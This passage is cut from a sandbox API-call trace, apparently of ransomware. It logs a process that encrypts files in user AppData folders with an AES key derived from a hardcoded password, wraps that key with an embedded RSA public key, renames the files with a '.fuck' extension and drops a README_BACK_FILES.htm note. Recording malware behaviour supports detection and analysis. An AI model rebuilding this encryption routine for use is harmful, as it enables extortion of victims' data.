lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.850] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.851] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.851] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.855] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.855] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.855] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.855] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.855] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.855] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.855] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.855] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.855] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.856] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.856] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.856] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.856] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.856] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.856] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.856] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.856] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.856] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.856] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.856] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.856] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.856] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.856] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.857] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.857] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.857] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.857] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.857] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.857] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.857] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.857] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.857] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.857] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.857] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.857] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.858] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.858] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.858] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.858] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.858] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.858] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.858] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.858] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.859] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.859] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.859] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.859] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.859] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.859] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.859] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.859] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.859] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.859] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.859] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.859] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.859] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.861] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\FORMS\\FRMDATA64.DAT.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\forms\\frmdata64.dat.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\FORMS\\FRMDATA64.DAT" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\forms\\frmdata64.dat"), bFailIfExists=0) returned 1 [0266.870] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\FORMS\\FRMDATA64.DAT", dwFileAttributes=0x0) returned 1 [0266.870] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\FORMS\\FRMDATA64.DAT.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\forms\\frmdata64.dat.gsg")) returned 1 [0266.873] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\FORMS\\FRMDATA64.DAT" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\forms\\frmdata64.dat"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\FORMS\\FRMDATA64.DAT.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\forms\\frmdata64.dat.fuck")) returned 1 [0266.874] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0266.874] CryptDestroyKey (hKey=0x2e7eb80) returned 1 [0266.874] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0266.874] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0266.874] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0266.874] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\FORMS\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\forms\\readme_back_files.htm")) returned 0xffffffff [0266.874] AreFileApisANSI () returned 1 [0266.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6950, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0266.875] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\FORMS\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\forms\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0266.875] GetFileType (hFile=0x5d10) returned 0x1 [0266.875] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0266.876] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0266.876] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\GameDVR\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2e7fbc0 [0266.877] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.877] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0266.877] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0266.877] GetLastError () returned 0x0 [0266.877] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\GameDVR\\KnownGameList.bin" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\gamedvr\\knowngamelist.bin")) returned 0x20 [0266.877] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\GameDVR\\KnownGameList.bin", dwFileAttributes=0x80) returned 1 [0266.878] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\GameDVR\\KnownGameList.bin" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\gamedvr\\knowngamelist.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0266.878] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\GameDVR\\KnownGameList.bin.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\gamedvr\\knowngamelist.bin.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0266.879] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\GameDVR\\KnownGameList.bin.gsg", dwFileAttributes=0x2) returned 1 [0266.880] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2e7a500) returned 1 [0266.882] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0266.882] lstrlenA (lpString="JixXDiFnyqBuaFrBqjXDqBDQzMlQm") returned 29 [0266.882] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0266.882] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2e7ec80) returned 1 [0266.883] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0266.883] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0266.883] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2e78af8) returned 1 [0266.883] CryptImportPublicKeyInfo (in: hCryptProv=0x2e78af8, dwCertEncodingType=0x1, pInfo=0x2eb0340*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb0370*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb0378*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2e7f6c0) returned 1 [0266.883] CryptEncrypt (in: hKey=0x2e7f6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0266.883] CryptEncrypt (in: hKey=0x2e7f6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e78410*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2e78410*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0266.883] WriteFile (in: hFile=0x5d44, lpBuffer=0x2e78410*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2e78410*, lpNumberOfBytesWritten=0x2b9d5a0*=0x80, lpOverlapped=0x0) returned 1 [0266.884] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0266.884] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0266.884] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x10, lpOverlapped=0x0) returned 1 [0266.885] CloseHandle (hObject=0xffffffff) returned 1 [0266.885] CloseHandle (hObject=0x5d44) returned 1 [0266.885] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\GameDVR\\KnownGameList.bin.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\gamedvr\\knowngamelist.bin.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\GameDVR\\KnownGameList.bin" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\gamedvr\\knowngamelist.bin"), bFailIfExists=0) returned 0 [0266.887] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\GameDVR\\KnownGameList.bin", dwFileAttributes=0x0) returned 1 [0266.887] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\GameDVR\\KnownGameList.bin.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\gamedvr\\knowngamelist.bin.gsg")) returned 1 [0266.889] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\GameDVR\\KnownGameList.bin" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\gamedvr\\knowngamelist.bin"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\GameDVR\\KnownGameList.bin.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\gamedvr\\knowngamelist.bin.fuck")) returned 0 [0266.889] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0266.889] CryptDestroyKey (hKey=0x2e7ec80) returned 1 [0266.889] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0266.889] FindNextFileA (in: 